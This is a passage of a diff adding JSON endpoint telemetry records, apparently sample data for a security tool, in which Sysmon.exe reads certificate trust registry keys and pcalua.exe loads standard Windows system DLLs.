+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pcalua.exe", + "image_path": "C:\\Windows\\System32\\pcalua.exe", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": 
"C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + 
"unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, 
+ { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974020000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pcaui.dll", + "image_path": "C:\\Windows\\System32\\pcaui.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wer.dll", + "image_path": "C:\\Windows\\System32\\wer.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573974170000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 
